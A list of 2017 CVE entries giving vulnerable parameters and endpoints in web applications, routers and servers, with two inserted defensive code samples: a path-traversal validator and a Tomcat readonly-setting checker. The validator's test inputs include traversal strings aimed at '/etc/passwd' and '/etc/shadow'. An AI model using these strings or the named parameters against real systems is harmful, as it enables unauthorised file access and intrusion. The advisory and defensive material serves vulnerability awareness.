SoftDatepro Dating Social Network 1.3 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15971.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15971 7.5
Same Sex Dating Software Pro 1.0 allows SQL Injection via the viewprofile.php profid parameter, the viewmessage.php sender_id parameter, or the /admin Email field, a related issue to CVE-2017-15972.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15970 7.5
PHP CityPortal 2.0 allows SQL Injection via the nid parameter to index.php in a page=news action, or the cat parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15969 7.5
PG All Share Video 1.0 allows SQL Injection via the PATH_INFO to search/tag, friends/index, users/profile, or video_catalog/category.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15968 7.5
MyBuilder Clone 1.0 allows SQL Injection via the phpsqlsearch_genxml.php subcategory parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15967 7.5
Mailing List Manager Pro 3.0 allows SQL Injection via the edit parameter to admin/users in a sort=login action, or the edit parameter to admin/template.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15966 7.5
The Zh YandexMap (aka com_zhyandexmap) component 6.1.1.0 for Joomla! allows SQL Injection via the placemarklistid parameter to index.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15965 7.5
The NS Download Shop (aka com_ns_downloadshop) component 2.2.6 for Joomla! allows SQL Injection via the id parameter in an invoice.create action.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15964 7.5
Job Board Script Software allows SQL Injection via the PATH_INFO to a /job-details URI.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15963 7.5
iTech Gigs Script 1.21 allows SQL Injection via the browse-scategory.php sc parameter or the service-provider.php ser parameter.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15962 7.5
iStock Management System 1.0 allows Arbitrary File Upload via user/profile.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15961 7.5
iProject Management System 1.0 allows SQL Injection via the ID parameter to index.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15960 7.5
Article Directory Script 3.0 allows SQL Injection via the id parameter to author.php or category.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15959 7.5
Adult Script Pro 2.2.4 allows SQL Injection via the PATH_INFO to a /download URI, a different vulnerability than CVE-2007-6576.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15958 7.5
D-Park Pro Domain Parking Script 1.0 allows SQL Injection via the username to admin/loginform.php.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2017-15957 6.5
my_profile.php in Ingenious School Management System 2.3.0 allows a student or teacher to upload an arbitrary file.
29-10-2017 - 02:29 29-10-2017 - 02:29
CVE-2014-2023 7.5
Multiple SQL injection vulnerabilities in the Tapatalk plugin 4.9.0 and earlier and 5.x through 5.2.1 for vBulletin allow remote attackers to execute arbitrary SQL commands via a crafted xmlrpc API request to (1) unsubscribe_forum.php or (2) unsubscr
26-10-2017 - 16:29 26-10-2017 - 16:29
CVE-2017-15879 6.8
CSV Injection (aka Excel Macro Injection or Formula Injection) exists in admin/server/api/download.js and lib/list/getCSVData.js in KeystoneJS before 4.0.0-beta.7 via a value that is mishandled in a CSV export.
24-10-2017 - 17:29 24-10-2017 - 17:29
CVE-2017-15878 4.3
A cross-site scripting (XSS) vulnerability exists in fields/types/markdown/MarkdownType.js in KeystoneJS before 4.0.0-beta.7 via the Contact Us feature.
24-10-2017 - 17:29 24-10-2017 - 17:29
CVE-2017-15081 7.5
In PHPSUGAR PHP Melody CMS 2.6.1, SQL Injection exists via the playlist parameter to playlists.php.
24-10-2017 - 02:29 24-10-2017 - 02:29
CVE-2017-13772 9.0
Multiple stack-based buffer overflows in TP-Link WR940N WiFi routers with hardware version 4 allow remote authenticated users to execute arbitrary code via the (1) ping_addr parameter to PingIframeRpm.htm or (2) dnsserver2 parameter to WanStaticIpV6C
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2015-5533 6.5
SQL injection vulnerability in counter-options.php in the Count Per Day plugin before 3.4.1 for WordPress allows remote authenticated administrators to execute arbitrary SQL commands via the cpd_keep_month parameter to wp-admin/options-general.php.
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2015-2878 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities in Hexis HawkEye G 3.0.1.4912 allow remote attackers to hijack the authentication of administrators for requests that (1) add arbitrary accounts via the name parameter to interface/rest/accou
23-10-2017 - 14:29 23-10-2017 - 14:29
CVE-2017-15687 4.3
DOM Based Cross Site Scripting (XSS) exists in Logitech Media Server 7.7.1, 7.7.2, 7.7.3, 7.7.5, 7.7.6, 7.9.0, and 7.9.1 via a crafted URI.
23-10-2017 - 04:29 23-10-2017 - 04:29
CVE-2017-15580 7.5
osTicket 1.10.1 provides a functionality to upload 'html' files with associated formats. However, it does not properly validate the uploaded file's contents and thus accepts any type of file, such as with a tickets.php request that is modified with a
23-10-2017 - 04:29 23-10-2017 - 04:29
CVE-2017-15730 6.8
In phpMyFAQ before 2.9.9, there is Cross-Site Request Forgery (CSRF) in admin/stat.ratings.php.
22-10-2017 - 14:29 22-10-2017 - 14:29
CVE-2017-15291 4.3
Cross-site scripting (XSS) vulnerability in the Wireless MAC Filtering page in TP-LINK TL-MR3220 wireless routers allows remote attackers to inject arbitrary web script or HTML via the Description field.
20-10-2017 - 13:29 20-10-2017 - 13:29
CVE-2017-15639 4.0
tasks/feed/readRSS.cfm in Mura CMS before 6.2 allows attackers to bypass intended access restrictions by leveraging the "draggable feeds" feature.
19-10-2017 - 15:29 19-10-2017 - 15:29
CVE-2017-10366 7.5
Vulnerability in the PeopleSoft Enterprise PT PeopleTools component of Oracle PeopleSoft Products (subcomponent: Performance Monitor). Supported versions that are affected are 8.54, 8.55 and 8.56. Easily exploitable vulnerability allows unauthenticat
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-10309 6.8
Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Deployment). Supported versions that are affected are Java SE: 8u144 and 9. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple prot
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-10033 3.3
Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Support Tools). Supported versions that are affected are 11.1.1.8.0 and 12.2.1.2.0. Difficult to exploit vulnerability allows unauthenticated attacker wi
19-10-2017 - 13:29 19-10-2017 - 13:29
CVE-2017-15359 4.0
In the 3CX Phone System 15.5.3554.1, the Management Console typically listens to port 5001 and is prone to a directory traversal attack: "/api/RecordingList/DownloadRecord?file=" and "/api/SupportInfo?file=" are the vulnerable parameters. An attacker
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2017-14956 3.5
AlienVault USM v5.4.2 and earlier offers authenticated users the functionality of exporting generated reports via the "/ossim/report/wizard_email.php" script. Besides offering an export via a local download, the script also offers the possibility to
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2017-14322 10.0
The function in init.php that checks whether the user is already logged in, in Interspire Email Marketer (IEM) prior to 6.1.6, allows remote attackers to bypass authentication and obtain administrative access by using the IEM_CookieLogin cookie wit
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-7715 6.8
Cross-site request forgery (CSRF) vulnerability in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allows remote attackers to hijack the authentication of administrators for requests that add a user via an add_user action to administrat
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-7714 6.5
Multiple SQL injection vulnerabilities in the Realtyna RPL (com_rpl) component before 8.9.5 for Joomla! allow remote administrators to execute arbitrary SQL commands via the (1) id, (2) copy_field in a data_copy action, (3) pshow in an update_field a
18-10-2017 - 14:29 18-10-2017 - 14:29
CVE-2015-2780 7.5
Unrestricted file upload vulnerability in Berta CMS allows remote attackers to execute arbitrary code by uploading a crafted image file with an executable extension, then accessing it via a direct request to the file in an unspecified directory.
16-10-2017 - 14:29 16-10-2017 - 14:29
CVE-2014-9148 7.5
Fiyo CMS 2.0.1.8 allows remote attackers to bypass intended access restrictions and execute the (1) "Install and Update" or (2) Backup super administrator function via the view parameter in a direct request to fiyo/dapur.
16-10-2017 - 11:29 16-10-2017 - 11:29
CVE-2014-9147 5.0
Fiyo CMS 2.0.1.8 allows remote attackers to obtain sensitive information via a direct request to the database backup file in .backup/.
16-10-2017 - 11:29 16-10-2017 - 11:29
CVE-2017-15374 4.3
Shopware v5.2.5 - v5.3 is vulnerable to cross site scripting in the customer and order section of the content management system backend modules. Remote attackers are able to inject malicious script code into the firstname, lastname, or order input fi
16-10-2017 - 00:29 16-10-2017 - 00:29
CVE-2017-12629 7.5
Remote code execution occurs in Apache Solr before 7.1 with Apache Lucene before 7.1 by exploiting XXE in conjunction with use of a Config API add-listener command to reach the RunExecutableListener class. Elasticsearch, although it uses Lucene, is N
14-10-2017 - 19:29 14-10-2017 - 19:29
CVE-2017-15276 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows an authenticated user to gain superuser privileges: Content Server allows uploading content using batches (TAR arc
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15014 4.0
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows authenticated users to download arbitrary content files regardless of the attacker's repository permissions: When
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15013 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 contains the following design gap, which allows an authenticated user to gain superuser privileges: Content Server stores information about uploaded files in dmr_
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15012 6.5
OpenText Documentum Content Server (formerly EMC Documentum Content Server) through 7.3 does not properly validate the input of the PUT_FILE RPC-command, which allows any authenticated user to hijack an arbitrary file from the Content Server filesyst
13-10-2017 - 12:29 13-10-2017 - 12:29
CVE-2017-15287 4.3
There is XSS in the BouquetEditor WebPlugin for Dream Multimedia Dreambox devices, as demonstrated by the "Name des Bouquets" field, or the file parameter to the /file URI.
12-10-2017 - 11:29 12-10-2017 - 11:29
CVE-2017-15284 3.5
Cross-Site Scripting exists in OctoberCMS 1.0.425 (aka Build 425), allowing a least privileged user to upload an SVG file containing malicious code as the Avatar for the profile. When this is opened by the Admin, it causes JavaScript execution in the
12-10-2017 - 04:29 12-10-2017 - 04:29
CVE-2017-14087 5.0
A Host Header Injection vulnerability in Trend Micro OfficeScan XG (12.0) may allow an attacker to spoof the Host header, causing pages generated from the poisoned header to render arbitrary links that point to a malicious website.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14086 7.8
Pre-authorization Start Remote Process vulnerabilities in Trend Micro OfficeScan 11.0 and XG may allow unauthenticated users who can access the OfficeScan server to start the fcgiOfcDDA.exe executable or cause a potential INI corruption, which may ca
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14085 5.0
Information disclosure vulnerabilities in Trend Micro OfficeScan 11.0 and XG may allow unauthenticated users who can access the OfficeScan server to query the network's NT domain or the PHP version and modules.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-14083 5.0
A vulnerability in Trend Micro OfficeScan 11.0 and XG allows remote unauthenticated users who can access the system to download the OfficeScan encryption file.
05-10-2017 - 21:29 05-10-2017 - 21:29
CVE-2017-12617 6.8
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload
03-10-2017 - 21:29 03-10-2017 - 21:29
CVE-2017-6090 6.5
Unrestricted file upload vulnerability in clients/editclient.php in PhpCollab 2.5.1 and earlier allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to th
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-6089 7.5
SQL injection vulnerability in PhpCollab 2.5.1 and earlier allows remote attackers to execute arbitrary SQL commands via the (1) project or id parameters to topics/deletetopics.php; the (2) id parameter to bookmarks/deletebookmarks.php; or the (3) id
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-14848 6.5
WPHRM Human Resource Management System for WordPress 1.0 allows SQL Injection via the employee_id parameter.
02-10-2017 - 21:29 02-10-2017 - 21:29
CVE-2017-14955 4.3
Check_MK before 1.2.8p26 mishandles certain errors within the failed-login save feature because of a race condition, which allows remote attackers to obtain sensitive user information by reading a GUI crash report.
01-10-2017 - 21:29 01-10-2017 - 21:29
CVE-2017-14738 7.5
FileRun (version 2017.09.18 and below) suffers from a remote SQL injection vulnerability due to a failure to sanitize input in the metafield parameter inside the metasearch module (under the search function).
29-09-2017 - 21:29 29-09-2017 - 21:29
CVE-2017-14620 4.3
SmarterStats 11.3.6347 renders the Referer field of HTTP log files at the /Data/Reports/ReferringURLsWithQueries URL, resulting in stored cross-site scripting.
29-09-2017 - 21:29 29-09-2017 - 21:29
CVE-2017-14507 7.5
Multiple SQL injection vulnerabilities in the Content Timeline plugin 4.4.2 for WordPress allow remote attackers to execute arbitrary SQL commands via the (1) timeline parameter in content_timeline_class.php; or the id parameter to (2) pages/content_
28-09-2017 - 21:34 28-09-2017 - 21:34
CVE-2017-14847 6.5
Mojoomla WPAMS Apartment Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14846 6.5
Mojoomla Hospital Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14845 6.5
Mojoomla WPCHURCH Church Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14844 6.5
Mojoomla WPGYM WordPress Gym Management System allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14843 6.5
Mojoomla School Management System for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14842 6.5
Mojoomla SMSmaster Multipurpose SMS Gateway for WordPress allows SQL Injection via the id parameter.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14841 4.0
Mojoomla Annual Maintenance Contract (AMC) Management System allows Arbitrary File Upload in profilesetting image handling.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14840 6.5
TeamWork TicketPlus allows Arbitrary File Upload in updateProfile.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14839 6.5
TeamWork Photo Fusion allows Arbitrary File Upload in changeAvatar and changeCover.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14838 6.5
TeamWork Job Links allows Arbitrary File Upload in profileChange and coverChange.
27-09-2017 - 21:29 27-09-2017 - 21:29
CVE-2017-14704 6.5
Multiple unrestricted file upload vulnerabilities in the (1) imageSubmit and (2) proof_submit functions in Claydip Laravel Airbnb Clone 1.0 allow remote authenticated users to execute arbitrary code by uploading a file with an executable extension, t
26-09-2017 - 10:29 26-09-2017 - 10:29
CVE-2017-14703 7.5
SQL injection vulnerability in Cash Back Comparison Script 1.0 allows remote attackers to execute arbitrary SQL commands via the PATH_INFO to search/.
26-09-2017 - 09:29 26-09-2017 - 09:29
CVE-2015-7293 6.8
Multiple cross-site request forgery (CSRF) vulnerabilities exist in Zope Management Interface 4.3.7 and earlier, and Plone before 5.x.
25-09-2017 - 17:29 25-09-2017 - 17:29
CVE-2015-4669 7.2
The MySQL "root" user in Xsuite 2.x does not have a password set, which allows local users to access databases on the system.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2015-4668 5.8
Open redirect vulnerability in Xsuite 2.4.4.5 and earlier allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirurl parameter.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2015-4667 7.5
Multiple hardcoded credentials exist in Xsuite 2.x.
25-09-2017 - 13:29 25-09-2017 - 13:29
CVE-2017-14717 3.5
In EPESI 1.8.2 rev20170830, there is Stored XSS in the Tasks Description parameter.
22-09-2017 - 15:29 22-09-2017 - 15:29
CVE-2017-14712 3.5
In EPESI 1.8.2 rev20170830, there is Stored XSS in the Tasks Phonecall Notes Title parameter.
22-09-2017 - 15:29 22-09-2017 - 15:29
CVE-2017-14619 4.3
Cross-site scripting (XSS) vulnerability in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the "Title of your FAQ" field in the Configuration Module.
20-09-2017 - 17:29 20-09-2017 - 17:29
CVE-2017-14618 3.5
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ through 2.9.8 allows remote attackers to inject arbitrary web script or HTML via the Questions field in an "Add New FAQ" action.
20-09-2017 - 17:29 20-09-2017 - 17:29
CVE-2015-7347 3.5
A cross-site scripting (XSS) vulnerability exists in ZCMS JavaServer Pages Content Management System 1.1.
20-09-2017 - 14:29 20-09-2017 - 14:29
CVE-2015-2826 5.0
WordPress Simple Ads Manager plugin 2.5.94 and 2.5.96 allows remote attackers to obtain sensitive information.
20-09-2017 - 14:29 20-09-2017 - 14:29
CVE-2015-4075 6.8
The Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to write to arbitrary .ini files via a crafted language.save task.
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4074 5.0
Directory traversal vulnerability in the Helpdesk Pro plugin before 1.4.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the filename parameter in a ticket.download_attachment task.
20-09-2017 - 12:29 20-09-2017 - 12:29
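The ".." traversal in CVE-2015-4074 above is the same defect that recurs throughout this list (the Kaspersky reportId, SOPlanning and Peplink entries below). The following is an added illustration of the check a download handler needs before opening a user-supplied filename; it is not Helpdesk Pro code, the attachment directory name is a placeholder, and the sample filenames are constructed.

```python
import os
from urllib.parse import unquote

# Placeholder base directory (assumption; not a real Helpdesk Pro path).
ATTACHMENT_DIR = "/srv/helpdesk/attachments"


def resolve_attachment(base_dir: str, filename: str) -> str:
    """Map a user-supplied filename to a path guaranteed to lie under base_dir.

    The web layer has usually URL-decoded the parameter once already; decoding
    again here only makes the check stricter, so clients that send the dots
    pre-encoded (..%2f..%2f) are caught too. Raises ValueError on any value
    that resolves outside base_dir.
    """
    if not filename or "\x00" in filename:
        raise ValueError("empty or NUL-containing filename")
    decoded = unquote(filename)
    base = os.path.realpath(base_dir)
    # os.path.join discards base_dir when `decoded` is absolute; that is one of
    # the cases the prefix check below must reject.
    candidate = os.path.realpath(os.path.join(base, decoded))
    if candidate != base and not candidate.startswith(base + os.sep):
        raise ValueError(f"path escapes {base_dir}: {filename!r}")
    return candidate


def classify(base_dir: str, filenames) -> dict:
    """Return {filename: 'allowed' | 'rejected'} for a batch of candidate values."""
    verdicts = {}
    for name in filenames:
        try:
            resolve_attachment(base_dir, name)
            verdicts[name] = "allowed"
        except ValueError:
            verdicts[name] = "rejected"
    return verdicts


# Constructed sample inputs: one legitimate name and four traversal attempts
# (relative, relative from a subdirectory, URL-encoded, and absolute).
SAMPLE_FILENAMES = [
    "ticket-42/receipt.pdf",
    "../../etc/passwd",
    "ticket-42/../../../etc/shadow",
    "..%2f..%2fetc%2fpasswd",
    "/etc/passwd",
]

if __name__ == "__main__":
    for name, verdict in classify(ATTACHMENT_DIR, SAMPLE_FILENAMES).items():
        print(f"{verdict:8} {name}")
```

Comparing resolved real paths rather than rejecting the literal string ".." is what makes the check hold up against encoded dots, absolute paths and symlinks inside the attachment directory.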
CVE-2015-4073 7.5
Multiple SQL injection vulnerabilities in the Helpdesk Pro plugin before 1.4.0 for Joomla! allow remote attackers to execute arbitrary SQL commands via the (1) ticket_code or (2) email parameter or (3) remote authenticated users to execute arbitrary
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4072 3.5
Multiple cross-site scripting (XSS) vulnerabilities in the Helpdesk Pro plugin before 1.4.0 for Joomla! allow remote attackers to inject arbitrary web script or HTML via vectors related to name and message.
20-09-2017 - 12:29 20-09-2017 - 12:29
CVE-2015-4685 4.4
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows local users with access to the plcm account to gain privileges via a script in /var/polycom/cma/upgrade/scripts, related to a sudo misconfiguration.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4684 5.5
Multiple directory traversal vulnerabilities in Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allow (1) remote authenticated users to read arbitrary files via a .. (dot dot) in the Modifier parameter to PlcmRmWeb/FileDownload; or remote
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4683 7.5
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows attackers to obtain sensitive information and potentially gain privileges by leveraging use of session identifiers as parameters with HTTP GET requests.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4682 4.0
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows remote authenticated users to obtain the installation path via an HTTP POST request to PlcmRmWeb/JConfigManager.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2015-4681 7.2
Polycom RealPresence Resource Manager (aka RPRM) before 8.4 allows local users to have unspecified impact via vectors related to weak passwords.
19-09-2017 - 15:29 19-09-2017 - 15:29
CVE-2017-14143 7.5
The getUserzoneCookie function in Kaltura before 13.2.0 uses a hardcoded cookie secret to validate cookie signatures, which allows remote attackers to bypass an intended protection mechanism and consequently conduct PHP object injection attacks and e
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9619 6.5
Unrestricted file upload vulnerability in webadmin/ajaxfilemanager/ajaxfilemanager.php in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote authenticated users with admin privileges on the Cloud Manager web console to
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9618 7.5
The Client Filter Admin portal in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and subsequently create arbitrary profiles via a showdeny action to the default URL.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9611 7.5
Netsweeper before 4.0.5 allows remote attackers to bypass authentication and create arbitrary accounts and policies via a request to webadmin/nslam/index.php.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2014-9610 5.0
Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to bypass authentication and remove IP addresses from the quarantine via the ip parameter to webadmin/user/quarantine_disable.php.
19-09-2017 - 11:29 19-09-2017 - 11:29
CVE-2017-12615 6.8
When running Apache Tomcat 7.0.0 to 7.0.79 on Windows with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP
19-09-2017 - 09:29 19-09-2017 - 09:29
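The precondition for CVE-2017-12615 is a DefaultServlet declared with readonly=false. The following is an added configuration check for that setting; it is not Apache Tomcat code, and the two web.xml fragments are constructed to mirror the shape of conf/web.xml rather than copied from a real deployment.

```python
import xml.etree.ElementTree as ET
from typing import Optional

DEFAULT_SERVLET_CLASS = "org.apache.catalina.servlets.DefaultServlet"


def _local_name(tag: str) -> str:
    # ElementTree prefixes tags with "{namespace}"; web.xml uses the Java EE namespace.
    return tag.rsplit("}", 1)[-1]


def default_servlet_params(web_xml: str) -> Optional[dict]:
    """Return the init-params of the DefaultServlet declaration, or None if absent."""
    root = ET.fromstring(web_xml)
    for servlet in root.iter():
        if _local_name(servlet.tag) != "servlet":
            continue
        servlet_class = None
        params = {}
        for child in servlet:
            name = _local_name(child.tag)
            if name == "servlet-class":
                servlet_class = (child.text or "").strip()
            elif name == "init-param":
                pname = pvalue = None
                for leaf in child:
                    if _local_name(leaf.tag) == "param-name":
                        pname = (leaf.text or "").strip()
                    elif _local_name(leaf.tag) == "param-value":
                        pvalue = (leaf.text or "").strip()
                if pname:
                    params[pname] = pvalue
        if servlet_class == DEFAULT_SERVLET_CLASS:
            return params
    return None


def put_enabled(web_xml: str) -> bool:
    """True when DefaultServlet will honour PUT/DELETE, i.e. readonly is explicitly false.

    Tomcat's built-in default for readonly is true, so a missing parameter or a
    missing DefaultServlet declaration means writes are refused.
    """
    params = default_servlet_params(web_xml)
    if params is None:
        return False
    return (params.get("readonly") or "true").strip().lower() == "false"


# Constructed sample: the exposed configuration (readonly=false) and its safe twin.
WRITABLE_WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>default</servlet-name>
    <servlet-class>org.apache.catalina.servlets.DefaultServlet</servlet-class>
    <init-param>
      <param-name>debug</param-name>
      <param-value>0</param-value>
    </init-param>
    <init-param>
      <param-name>readonly</param-name>
      <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
  </servlet>
</web-app>
"""
SAFE_WEB_XML = WRITABLE_WEB_XML.replace(
    "<param-value>false</param-value>", "<param-value>true</param-value>"
)

if __name__ == "__main__":
    print("writable:", put_enabled(WRITABLE_WEB_XML))  # True
    print("safe:", put_enabled(SAFE_WEB_XML))          # False
```

Run it over both the global conf/web.xml and each application's WEB-INF/web.xml, since either may declare the servlet; an application-level override wins.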
CVE-2017-9798 5.0
Apache httpd allows remote attackers to read secret data from process memory if the Limit directive can be set in a user's .htaccess file, or if httpd.conf has certain misconfigurations, aka Optionsbleed. This affects the Apache HTTP Server through 2
18-09-2017 - 11:29 18-09-2017 - 11:29
CVE-2017-14244 10.0
An authentication bypass vulnerability on iBall Baton ADSL2+ Home Router FW_iB-LR7011A_1.0.2 devices potentially allows attackers to directly access administrative router settings by crafting URLs with a .cgi extension, as demonstrated by /info.cgi a
17-09-2017 - 15:29 17-09-2017 - 15:29
CVE-2017-14243 10.0
An authentication bypass vulnerability on UTStar WA3002G4 ADSL Broadband Modem WA3002G4-0021.01 devices allows attackers to directly access administrative settings and obtain cleartext credentials from HTML source, as demonstrated by info.cgi, upload
17-09-2017 - 15:29 17-09-2017 - 15:29
CVE-2014-9463 9.0
functions_vbseo_hook.php in the VBSEO module for vBulletin allows remote authenticated users to execute arbitrary code via the HTTP Referer header to visitormessage.php.
15-09-2017 - 16:29 15-09-2017 - 16:29
CVE-2017-1002003 7.5
Vulnerability in the WordPress plugin wp2android-turn-wp-site-into-android-app v1.1.4: the plugin includes unlicensed, vulnerable CMS software from http://www.invedion.com.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002002 7.5
Vulnerability in the WordPress plugin webapp-builder v2.0: the plugin includes unlicensed, vulnerable CMS software from http://www.invedion.com/
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002001 7.5
Vulnerability in the WordPress plugin mobile-app-builder-by-wappress v1.05: the plugin includes unlicensed, vulnerable CMS software from http://www.invedion.com.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-1002000 7.5
Vulnerability in the WordPress plugin mobile-friendly-app-builder-by-easytouch v3.0: the code in ./mobile-friendly-app-builder-by-easytouch/server/images.php neither requires authentication nor checks that the user is allowed to upload content.
14-09-2017 - 09:29 14-09-2017 - 09:29
CVE-2017-3133 4.3
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the Replacement Message HTML for SSL-VPN.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2017-3132 4.3
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.6.0 and earlier allows attackers to execute unauthorized code or commands via the action input during the activation of a FortiToken.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2017-3131 3.5
A Cross-Site Scripting vulnerability in Fortinet FortiOS versions 5.4.0 through 5.4.4 and 5.6.0 allows attackers to execute unauthorized code or commands via the filter input in "Applications" under FortiView.
11-09-2017 - 22:29 11-09-2017 - 22:29
CVE-2015-8351 6.8
PHP remote file inclusion vulnerability in the Gwolle Guestbook plugin before 1.5.4 for WordPress, when allow_url_include is enabled, allows remote authenticated users to execute arbitrary PHP code via a URL in the abspath parameter to frontend/captc
11-09-2017 - 16:29 11-09-2017 - 16:29
CVE-2017-14219 4.3
XSS (persistent) on the Intelbras Wireless N 150Mbps router with firmware WRN 240 allows attackers to steal wireless credentials without being connected to the network, related to userRpm/popupSiteSurveyRpm.htm and userRpm/WlanSecurityRpm.htm. The at
07-09-2017 - 18:29 07-09-2017 - 18:29
CVE-2015-3314 6.8
SQL injection vulnerability in WordPress Tune Library plugin before 1.5.5.
07-09-2017 - 16:29 07-09-2017 - 16:29
CVE-2015-3313 7.5
SQL injection vulnerability in WordPress Community Events plugin before 1.4.
07-09-2017 - 16:29 07-09-2017 - 16:29
CVE-2017-14147 7.5
An issue was discovered on FiberHome user-end routers bearing model number AN1020-25 which could allow an attacker to restore the router to its factory settings simply by browsing to the link http://[Default-Router-IP]/restoreinfo.cgi & execute
07-09-2017 - 10:29 07-09-2017 - 10:29
CVE-2017-13754 3.5
Cross-site scripting (XSS) vulnerability in the "advanced settings - time server" module in Wibu-Systems CodeMeter before 6.50b allows remote attackers to inject arbitrary web script or HTML via the "server name" field in actions/ChangeConfiguration.
07-09-2017 - 09:29 07-09-2017 - 09:29
CVE-2017-13713 6.5
T&W WIFI Repeater BE126 allows remote authenticated users to execute arbitrary code via shell metacharacters in the user parameter to cgi-bin/webupg.
07-09-2017 - 09:29 07-09-2017 - 09:29
CVE-2015-7241 7.5
XML External Entity (XXE) vulnerability in SAP Netweaver before 7.01.
06-09-2017 - 17:29 06-09-2017 - 17:29
CVE-2017-14126 4.3
